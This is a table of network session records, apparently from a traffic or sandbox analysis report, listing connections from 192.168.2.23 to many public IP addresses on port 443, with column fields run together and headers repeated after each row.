                                                22163192.168.2.235213266.242.182.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22164192.168.2.234601440.240.39.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22165192.168.2.2358826138.160.77.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22166192.168.2.23454422.131.244.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22167192.168.2.233447436.215.100.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22168192.168.2.2347590112.136.144.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22169192.168.2.235743090.132.190.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22170192.168.2.235101445.49.158.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22171192.168.2.235055872.202.42.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22172192.168.2.235772843.194.95.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22173192.168.2.233908863.14.199.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22174192.168.2.2345152222.114.185.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22175192.168.2.2351456138.135.116.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22176192.168.2.234593250.215.173.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22177192.168.2.235066264.81.82.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22178192.168.2.2353392192.197.53.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22179192.168.2.2354546222.186.75.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22180192.168.2.2333670103.233.54.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22181192.168.2.235927486.38.249.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22182192.168.2.2359000206.169.11.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22183192.168.2.235924438.75.115.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22184192.168.2.2334960180.88.84.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22185192.168.2.2347016192.27.143.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22186192.168.2.2356452117.248.194.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22187192.168.2.2342206109.90.101.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22188192.168.2.23343862.16.180.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22189192.168.2.2347238183.61.10.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22190192.168.2.2337680190.114.228.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22191192.168.2.2353922189.19.152.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192192.168.2.2340462153.96.254.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22193192.168.2.2342454144.222.201.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22194192.168.2.2336112161.240.225.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22195192.168.2.235538843.154.222.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22196192.168.2.2339828205.43.121.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22197192.168.2.233593286.102.180.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22198192.168.2.2358396198.174.217.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22199192.168.2.2341078199.34.38.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22200192.168.2.233756693.63.168.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22201192.168.2.233530627.216.49.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22202192.168.2.236016068.125.129.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22203192.168.2.234920093.131.74.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22204192.168.2.2358976138.182.244.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22205192.168.2.2359264180.235.1.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22206192.168.2.234399036.181.73.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22207192.168.2.236072485.248.167.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22208192.168.2.2340400180.78.73.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22209192.168.2.235221282.70.65.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22210192.168.2.234576861.212.101.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22211192.168.2.2351136141.161.247.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22212192.168.2.234939845.116.171.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22213192.168.2.2342874172.127.193.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22214192.168.2.235537876.8.121.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22215192.168.2.2346008150.235.234.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22216192.168.2.2359510110.228.116.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22217192.168.2.235741827.72.10.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22218192.168.2.235676696.14.248.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22219192.168.2.2341678149.85.243.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22220192.168.2.2341092171.206.66.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22221192.168.2.2357418175.90.178.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22222192.168.2.2349830195.64.143.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22223192.168.2.2357288164.174.32.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22224192.168.2.2338250155.115.70.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22225192.168.2.2350320142.146.197.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22226192.168.2.233438483.23.55.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22227192.168.2.2347100170.200.252.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22228192.168.2.234596892.38.158.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22229192.168.2.234862031.15.5.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22230192.168.2.2337876106.243.24.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22231192.168.2.2335072150.226.81.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22232192.168.2.2337942138.169.92.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22233192.168.2.2357904181.215.14.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22234192.168.2.2339562147.177.144.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22235192.168.2.2342488133.139.212.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22236192.168.2.235438894.108.2.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22237192.168.2.2356758101.25.183.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22238192.168.2.234942024.83.39.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22239192.168.2.2348628191.135.115.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22240192.168.2.2356180117.247.200.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22241192.168.2.2347336138.80.247.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22242192.168.2.235783867.117.183.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22243192.168.2.2356332195.199.168.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22244192.168.2.234245264.231.97.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22245192.168.2.2335624207.220.206.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22246192.168.2.234225685.242.36.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22247192.168.2.235606270.222.73.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22248192.168.2.234459619.136.141.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22249192.168.2.2336846223.137.63.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22250192.168.2.2335424157.5.127.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22251192.168.2.2342030154.168.87.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22252192.168.2.2355270101.13.62.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22253192.168.2.2346318188.13.216.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22254192.168.2.234196064.81.168.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22255192.168.2.2344614129.234.204.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22256192.168.2.233720623.228.166.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22257192.168.2.235842487.232.161.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22258192.168.2.235453863.10.94.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22259192.168.2.2333516156.39.98.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22260192.168.2.2341308128.180.254.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22261192.168.2.2337746116.30.173.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22262192.168.2.235322038.153.217.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22263192.168.2.2337758201.186.31.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22264192.168.2.235773482.80.205.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22265192.168.2.2341642166.207.231.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22266192.168.2.235159624.13.226.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22267192.168.2.2345318150.254.119.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22268192.168.2.233995853.60.34.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22269192.168.2.2334526177.155.122.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22270192.168.2.2360348163.87.75.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22271192.168.2.234022898.202.13.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22272192.168.2.235814484.3.196.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22273192.168.2.2341664151.198.27.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22274192.168.2.2348658172.177.235.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22275192.168.2.235752454.110.195.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22276192.168.2.2334754211.185.151.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22277192.168.2.2357406173.47.48.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22278192.168.2.2357694122.65.35.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22279192.168.2.234704044.116.68.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22280192.168.2.2350560212.43.145.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22281192.168.2.234548078.118.117.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22282192.168.2.2338222157.36.129.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22283192.168.2.2333372168.168.41.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22284192.168.2.235338246.38.162.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22285192.168.2.236033032.66.154.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22286192.168.2.234105482.93.77.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22287192.168.2.2338890119.148.248.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22288192.168.2.2340654130.181.214.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22289192.168.2.2354556115.60.205.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22290192.168.2.2338414124.23.27.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22291192.168.2.233485878.43.132.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22292192.168.2.233996620.179.197.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22293192.168.2.235681871.240.194.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22294192.168.2.2345730113.187.140.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22295192.168.2.235974670.67.73.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22296192.168.2.234005084.147.194.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22297192.168.2.2333488125.8.160.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22298192.168.2.234155272.140.204.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22299192.168.2.2357696142.166.11.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22300192.168.2.2336274121.166.231.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22301192.168.2.2336516177.160.12.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22302192.168.2.233717677.69.165.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22303192.168.2.235183298.200.235.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22304192.168.2.235731680.26.185.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22305192.168.2.234089446.111.105.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22306192.168.2.2356200211.71.170.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22307192.168.2.2348816112.20.47.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22308192.168.2.23454964.227.169.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22309192.168.2.2357094166.66.128.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22310192.168.2.2337322113.164.63.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22311192.168.2.234930480.171.30.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22312192.168.2.235278657.28.244.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22313192.168.2.2359404178.201.177.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22314192.168.2.2358398145.227.138.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22315192.168.2.2336852202.222.241.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22316192.168.2.233819419.129.17.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22317192.168.2.233499063.91.41.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22318192.168.2.233283817.61.251.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22319192.168.2.234463896.218.169.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22320192.168.2.233964871.249.173.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22321192.168.2.2354264221.51.199.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22322192.168.2.23547268.19.61.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22323192.168.2.235277045.238.158.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22324192.168.2.2338840106.110.227.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22325192.168.2.234938494.112.241.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22326192.168.2.2333952147.202.104.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22327192.168.2.236043439.97.154.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22328192.168.2.2343766141.251.60.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22329192.168.2.234918479.91.178.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22330192.168.2.2358130124.65.33.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22331192.168.2.235075625.65.194.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22332192.168.2.234528075.110.124.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22333192.168.2.236047879.57.49.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22334192.168.2.2356928182.15.210.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22335192.168.2.2341242203.174.189.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22336192.168.2.234380684.148.44.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22337192.168.2.2357682152.139.175.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22338192.168.2.2355022101.212.23.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22339192.168.2.234273863.135.38.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22340192.168.2.235677459.198.224.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22341192.168.2.2348904167.221.88.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22342192.168.2.2347378152.85.251.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22343192.168.2.23490262.135.197.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22344192.168.2.236005463.42.136.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22345192.168.2.2337026197.210.137.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22346192.168.2.2339142201.26.49.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22347192.168.2.233782075.178.226.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22348192.168.2.2339104168.50.219.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22349192.168.2.2357852165.183.149.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22350192.168.2.233284495.56.126.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22351192.168.2.2348778143.66.133.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22352192.168.2.2360270113.95.75.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22353192.168.2.2352928120.138.87.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22354192.168.2.235903462.132.49.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22355192.168.2.235520477.107.89.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22356192.168.2.2355244157.176.52.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22357192.168.2.2341202212.212.93.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22358192.168.2.2357382174.129.161.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22359192.168.2.235954079.72.4.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22360192.168.2.2341220133.242.167.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22361192.168.2.2342604173.139.6.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22362192.168.2.2334236102.232.108.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22363192.168.2.2344936156.48.250.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22364192.168.2.2336310137.2.16.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22365192.168.2.233507273.123.127.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22366192.168.2.2334158138.225.184.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22367192.168.2.2352776200.104.121.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22368192.168.2.234472443.94.23.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22369192.168.2.2349882171.200.54.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22370192.168.2.2336856105.49.153.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22371192.168.2.2337090180.109.116.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22372192.168.2.2333096208.43.3.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22373192.168.2.233467694.1.130.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22374192.168.2.23461785.66.248.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22375192.168.2.234804634.251.88.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22376192.168.2.2341494200.102.124.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22377192.168.2.235294083.168.243.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22378192.168.2.235322050.90.158.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22379192.168.2.2346786126.83.169.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22380192.168.2.2348310190.182.100.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22381192.168.2.2353788146.230.185.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22382192.168.2.2353366128.254.147.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22383192.168.2.23338501.176.69.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22384192.168.2.2359316175.162.167.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
